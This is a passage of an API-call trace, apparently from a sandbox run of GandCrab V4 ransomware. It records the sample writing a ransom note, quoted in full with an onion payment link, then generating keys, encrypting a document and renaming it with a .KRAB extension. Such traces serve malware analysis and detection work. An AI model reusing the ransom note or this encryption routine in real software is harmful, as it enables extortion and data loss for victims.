lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg" [0089.601] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\" [0089.601] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0089.601] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0089.601] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0089.601] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0089.601] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0089.602] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.602] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.602] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\\\KRAB-DECRYPT.txt") returned 101 [0089.602] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0089.603] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0089.603] WriteFile (in: hFile=0x43c, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0089.604] CloseHandle (hObject=0x43c) returned 1 [0089.604] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.604] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.604] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x24, wMilliseconds=0x327)) [0089.604] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.605] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0089.605] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0089.605] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\d2ca4a08d2ca4dee3d.lock") returned 107 [0089.605] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x43c [0089.606] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.606] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.606] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\") returned 84 [0089.606] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\*" [0089.606] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0x1023278 [0089.606] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.606] FindNextFileW (in: hFindFile=0x1023278, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0089.606] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.606] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.607] FindNextFileW (in: hFindFile=0x1023278, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0089.607] lstrcmpW (lpString1="893LR Fp.doc", lpString2=".") returned 1 [0089.607] lstrcmpW (lpString1="893LR Fp.doc", lpString2="..") returned 1 [0089.607] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\", lpString2="893LR Fp.doc" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\893LR Fp.doc") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\893LR Fp.doc" [0089.607] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.607] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\893LR Fp.doc.KRAB") returned 101 [0089.607] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\893LR Fp.doc") returned 96 [0089.607] lstrlenW (lpString=".doc") returned 4 [0089.607] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.607] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".doc ") returned 5 [0089.607] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.608] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\893LR Fp.doc") returned 96 [0089.608] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\893LR Fp.doc") returned 96 [0089.608] lstrcmpiW (lpString1="893LR Fp.doc", lpString2="desktop.ini") returned -1 [0089.608] lstrcmpiW (lpString1="893LR Fp.doc", lpString2="autorun.inf") returned -1 [0089.608] lstrcmpiW (lpString1="893LR Fp.doc", lpString2="ntuser.dat") returned -1 [0089.608] lstrcmpiW (lpString1="893LR Fp.doc", lpString2="iconcache.db") returned -1 [0089.608] lstrcmpiW (lpString1="893LR Fp.doc", lpString2="bootsect.bak") returned -1 [0089.608] lstrcmpiW (lpString1="893LR Fp.doc", lpString2="boot.ini") returned -1 [0089.608] lstrcmpiW (lpString1="893LR Fp.doc", lpString2="ntuser.dat.log") returned -1 [0089.608] lstrcmpiW (lpString1="893LR Fp.doc", lpString2="thumbs.db") returned -1 [0089.608] lstrcmpiW (lpString1="893LR Fp.doc", lpString2="KRAB-DECRYPT.html") returned -1 [0089.608] lstrcmpiW (lpString1="893LR Fp.doc", lpString2="KRAB-DECRYPT.txt") returned -1 [0089.608] lstrcmpiW (lpString1="893LR Fp.doc", lpString2="CRAB-DECRYPT.txt") returned -1 [0089.608] lstrcmpiW (lpString1="893LR Fp.doc", lpString2="ntldr") returned -1 [0089.608] lstrcmpiW (lpString1="893LR Fp.doc", lpString2="NTDETECT.COM") returned -1 [0089.608] lstrcmpiW (lpString1="893LR Fp.doc", lpString2="Bootfont.bin") returned -1 [0089.608] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.609] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0x1011678) returned 1 [0089.611] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0089.612] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.612] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.612] CryptGenRandom (in: hProv=0x1011678, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0089.612] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0089.612] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.612] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0x1011018) returned 1 [0089.614] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0089.614] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.614] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.614] CryptGenRandom (in: hProv=0x1011018, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0089.614] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0089.614] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.615] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0x1010df8) returned 1 [0089.617] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0x1023338) returned 1 [0089.617] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0089.617] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0089.617] GetLastError () returned 0x0 [0089.617] CryptDestroyKey (hKey=0x1023338) returned 1 [0089.617] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0089.617] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0x1010820) returned 1 [0089.619] CryptImportKey (in: hProv=0x1010820, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0x1023338) returned 1 [0089.619] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0089.619] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0089.619] GetLastError () returned 0x0 [0089.619] CryptDestroyKey (hKey=0x1023338) returned 1 [0089.619] CryptReleaseContext (hProv=0x1010820, dwFlags=0x0) returned 1 [0089.619] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\893LR Fp.doc" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\893lr fp.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x774 [0089.620] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0089.620] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0089.621] ReadFile (in: hFile=0x774, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e7fc*=0x1215, lpOverlapped=0x0) returned 1 [0089.636] SetFilePointerEx (in: hFile=0x774, liDistanceToMove=0xffffedeb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.636] WriteFile (in: hFile=0x774, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1215, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e7f8*=0x1215, lpOverlapped=0x0) returned 1 [0089.636] WriteFile (in: hFile=0x774, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0089.636] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.640] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.640] CloseHandle (hObject=0x774) returned 1 [0089.640] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.641] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\893LR Fp.doc" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\893lr fp.doc"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\893LR Fp.doc.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\893lr fp.doc.krab")) returned 1 [0089.641] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.642] FindNextFileW (in: hFindFile=0x1023278, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0089.642] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0089.642] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0089.642] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\d2ca4a08d2ca4dee3d.lock" [0089.642] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.642] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 112 [0089.642] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\d2ca4a08d2ca4dee3d.lock") returned 107 [0089.642] lstrlenW (lpString=".lock") returned 5 [0089.642] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.643] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0089.643] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.643] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.643] FindNextFileW (in: hFindFile=0x1023278, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0089.643] lstrcmpW (lpString1="JLwxnfQT", lpString2=".") returned 1 [0089.643] lstrcmpW (lpString1="JLwxnfQT", lpString2="..") returned 1 [0089.643] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\", lpString2="JLwxnfQT" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT" [0089.643] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\" [0089.643] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0089.644] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0089.644] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0089.644] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0089.644] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0089.644] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.644] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.644] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\\\KRAB-DECRYPT.txt") returned 110 [0089.645] CreateFileW 